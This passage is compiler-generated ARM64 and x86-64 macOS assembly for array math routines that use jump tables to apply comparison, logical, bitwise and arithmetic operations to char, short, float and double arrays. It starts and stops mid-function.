ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_28: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x10, [x9]
sdiv x9, x8, x10
mul x9, x9, x10
subs x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_29: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
add x8, x8, #1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_30: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
subs x8, x8, #1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_31:
b LBB3_33
LBB3_32: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #8
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #8
str x8, [sp, #40]
b LBB3_1
LBB3_33:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI3_0:
.long LBB3_4-Ltmp7
.long LBB3_5-Ltmp7
.long LBB3_6-Ltmp7
.long LBB3_7-Ltmp7
.long LBB3_8-Ltmp7
.long LBB3_9-Ltmp7
.long LBB3_10-Ltmp7
.long LBB3_13-Ltmp7
.long LBB3_16-Ltmp7
.long LBB3_17-Ltmp7
.long LBB3_18-Ltmp7
.long LBB3_19-Ltmp7
.long LBB3_20-Ltmp7
.long LBB3_21-Ltmp7
.long LBB3_22-Ltmp7
.long LBB3_23-Ltmp7
.long LBB3_24-Ltmp7
.long LBB3_25-Ltmp7
.long LBB3_26-Ltmp7
.long LBB3_27-Ltmp7
.long LBB3_28-Ltmp7
.long LBB3_29-Ltmp7
.long LBB3_30-Ltmp7
; -- End function
.globl _fArrayMathCA ; -- Begin function fArrayMathCA
.p2align 2
_fArrayMathCA: ; @fArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
str s0, [sp, #52]
str x1, [sp, #40]
str x2, [sp, #32]
strb w3, [sp, #31]
b LBB4_1
LBB4_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB4_26
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB4_24
; %bb.3: ; in Loop: Header=BB4_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI4_0@PAGE
add x10, x10, lJTI4_0@PAGEOFF
Ltmp9:
adr x8, Ltmp9
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB4_4: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, eq
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_5: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, ne
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_6: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, mi
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_7: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, gt
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_8: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, ls
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_9: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fcmp s0, s1
cset w8, ge
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_10: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
fcmp s0, #0.0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_12
b LBB4_11
LBB4_11: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #40]
ldr s0, [x8]
fcmp s0, #0.0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB4_12
LBB4_12: ; in Loop: Header=BB4_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_13: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
fcmp s0, #0.0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_15
b LBB4_14
LBB4_14: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #40]
ldr s0, [x8]
fcmp s0, #0.0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB4_15
LBB4_15: ; in Loop: Header=BB4_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_16: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
fcmp s0, #0.0
cset w8, eq
and w8, w8, #0x1
scvtf s0, w8
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_17: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_18: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fadd s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_19: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fsub s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_20: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fmul s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_21: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
ldr x8, [sp, #40]
ldr s1, [x8]
fdiv s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_22: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
fmov s1, #1.00000000
fadd s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_23: ; in Loop: Header=BB4_1 Depth=1
ldr s0, [sp, #52]
fmov s1, #1.00000000
fsub s0, s0, s1
ldr x8, [sp, #56]
str s0, [x8]
b LBB4_25
LBB4_24:
b LBB4_26
LBB4_25: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #4
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #4
str x8, [sp, #40]
b LBB4_1
LBB4_26:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI4_0:
.long LBB4_4-Ltmp9
.long LBB4_5-Ltmp9
.long LBB4_6-Ltmp9
.long LBB4_7-Ltmp9
.long LBB4_8-Ltmp9
.long LBB4_9-Ltmp9
.long LBB4_10-Ltmp9
.long LBB4_13-Ltmp9
.long LBB4_16-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_17-Ltmp9
.long LBB4_18-Ltmp9
.long LBB4_19-Ltmp9
.long LBB4_20-Ltmp9
.long LBB4_21-Ltmp9
.long LBB4_24-Ltmp9
.long LBB4_22-Ltmp9
.long LBB4_23-Ltmp9
; -- End function
.globl _dArrayMathCA ; -- Begin function dArrayMathCA
.p2align 2
_dArrayMathCA: ; @dArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
str d0, [sp, #48]
str x1, [sp, #40]
str x2, [sp, #32]
strb w3, [sp, #31]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB5_26
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB5_24
; %bb.3: ; in Loop: Header=BB5_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI5_0@PAGE
add x10, x10, lJTI5_0@PAGEOFF
Ltmp11:
adr x8, Ltmp11
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, eq
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_5: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, ne
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, mi
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, gt
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_8: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, ls
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_9: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fcmp d0, d1
cset w8, ge
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_10: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
fcmp d0, #0.0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB5_12
b LBB5_11
LBB5_11: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #40]
ldr d0, [x8]
fcmp d0, #0.0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB5_12
LBB5_12: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_13: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
fcmp d0, #0.0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB5_15
b LBB5_14
LBB5_14: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #40]
ldr d0, [x8]
fcmp d0, #0.0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB5_15
LBB5_15: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_16: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
fcmp d0, #0.0
cset w8, eq
and w8, w8, #0x1
scvtf d0, w8
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_17: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_18: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fadd d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_19: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fsub d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_20: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fmul d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_21: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
ldr x8, [sp, #40]
ldr d1, [x8]
fdiv d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_22: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
fmov d1, #1.00000000
fadd d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_23: ; in Loop: Header=BB5_1 Depth=1
ldr d0, [sp, #48]
fmov d1, #1.00000000
fsub d0, d0, d1
ldr x8, [sp, #56]
str d0, [x8]
b LBB5_25
LBB5_24:
b LBB5_26
LBB5_25: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #8
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #8
str x8, [sp, #40]
b LBB5_1
LBB5_26:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI5_0:
.long LBB5_4-Ltmp11
.long LBB5_5-Ltmp11
.long LBB5_6-Ltmp11
.long LBB5_7-Ltmp11
.long LBB5_8-Ltmp11
.long LBB5_9-Ltmp11
.long LBB5_10-Ltmp11
.long LBB5_13-Ltmp11
.long LBB5_16-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_17-Ltmp11
.long LBB5_18-Ltmp11
.long LBB5_19-Ltmp11
.long LBB5_20-Ltmp11
.long LBB5_21-Ltmp11
.long LBB5_24-Ltmp11
.long LBB5_22-Ltmp11
.long LBB5_23-Ltmp11
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _cArrayMathCA ## -- Begin function cArrayMathCA
.p2align 4, 0x90
_cArrayMathCA: ## @cArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %r8b, %al
## kill: def $sil killed $sil killed $esi
movq %rdi, -8(%rbp)
movb %sil, -9(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movb %al, -33(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB0_32
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB0_30
## %bb.33: ## in Loop: Header=BB0_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI0_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB0_3: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
sete %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
setl %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
setg %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
setle %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cmpl %ecx, %eax
setge %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -49(%rbp) ## 1-byte Spill
je LBB0_11
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
movq -24(%rbp), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB0_11: ## in Loop: Header=BB0_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_12: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %ecx
movb $1, %al
cmpl $0, %ecx
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB0_14
## %bb.13: ## in Loop: Header=BB0_1 Depth=1
movq -24(%rbp), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB0_14: ## in Loop: Header=BB0_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_15: ## in Loop: Header=BB0_1 Depth=1
cmpb $0, -9(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_16: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_17: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_18: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
andl %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_19: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
orl %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_20: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
xorl %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_21: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
xorl $-1, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_22: ## in Loop: Header=BB0_1 Depth=1
movb -9(%rbp), %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_23: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
addl %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_24: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
subl %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_25: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
imull %ecx, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_26: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cltd
idivl %ecx
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_27: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
movq -24(%rbp), %rcx
movsbl (%rcx), %ecx
cltd
idivl %ecx
movb %dl, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_28: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
addl $1, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_29: ## in Loop: Header=BB0_1 Depth=1
movsbl -9(%rbp), %eax
subl $1, %eax
movb %al, %cl
movq -8(%rbp), %rax
movb %cl, (%rax)
jmp LBB0_31
LBB0_30:
jmp LBB0_32
LBB0_31: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
addq $1, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $1, %rax
movq %rax, -24(%rbp)
jmp LBB0_1
LBB0_32:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L0_0_set_3, LBB0_3-LJTI0_0
.set L0_0_set_4, LBB0_4-LJTI0_0
.set L0_0_set_5, LBB0_5-LJTI0_0
.set L0_0_set_6, LBB0_6-LJTI0_0
.set L0_0_set_7, LBB0_7-LJTI0_0
.set L0_0_set_8, LBB0_8-LJTI0_0
.set L0_0_set_9, LBB0_9-LJTI0_0
.set L0_0_set_12, LBB0_12-LJTI0_0
.set L0_0_set_15, LBB0_15-LJTI0_0
.set L0_0_set_16, LBB0_16-LJTI0_0
.set L0_0_set_17, LBB0_17-LJTI0_0
.set L0_0_set_18, LBB0_18-LJTI0_0
.set L0_0_set_19, LBB0_19-LJTI0_0
.set L0_0_set_20, LBB0_20-LJTI0_0
.set L0_0_set_21, LBB0_21-LJTI0_0
.set L0_0_set_22, LBB0_22-LJTI0_0
.set L0_0_set_23, LBB0_23-LJTI0_0
.set L0_0_set_24, LBB0_24-LJTI0_0
.set L0_0_set_25, LBB0_25-LJTI0_0
.set L0_0_set_26, LBB0_26-LJTI0_0
.set L0_0_set_27, LBB0_27-LJTI0_0
.set L0_0_set_28, LBB0_28-LJTI0_0
.set L0_0_set_29, LBB0_29-LJTI0_0
LJTI0_0:
.long L0_0_set_3
.long L0_0_set_4
.long L0_0_set_5
.long L0_0_set_6
.long L0_0_set_7
.long L0_0_set_8
.long L0_0_set_9
.long L0_0_set_12
.long L0_0_set_15
.long L0_0_set_16
.long L0_0_set_17
.long L0_0_set_18
.long L0_0_set_19
.long L0_0_set_20
.long L0_0_set_21
.long L0_0_set_22
.long L0_0_set_23
.long L0_0_set_24
.long L0_0_set_25
.long L0_0_set_26
.long L0_0_set_27
.long L0_0_set_28
.long L0_0_set_29
.end_data_region
## -- End function
.globl _sArrayMathCA ## -- Begin function sArrayMathCA
.p2align 4, 0x90
_sArrayMathCA: ## @sArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %r8b, %al
## kill: def $si killed $si killed $esi
movq %rdi, -8(%rbp)
movw %si, -10(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movb %al, -33(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB1_32
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB1_30
## %bb.33: ## in Loop: Header=BB1_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI1_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB1_3: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
sete %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_4: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_5: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
setl %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_6: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
setg %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
setle %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_8: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cmpl %ecx, %eax
setge %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_9: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -49(%rbp) ## 1-byte Spill
je LBB1_11
## %bb.10: ## in Loop: Header=BB1_1 Depth=1
movq -24(%rbp), %rax
movswl (%rax), %eax
cmpl $0, %eax
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB1_11: ## in Loop: Header=BB1_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_12: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %ecx
movb $1, %al
cmpl $0, %ecx
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB1_14
## %bb.13: ## in Loop: Header=BB1_1 Depth=1
movq -24(%rbp), %rax
movswl (%rax), %eax
cmpl $0, %eax
setne %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB1_14: ## in Loop: Header=BB1_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
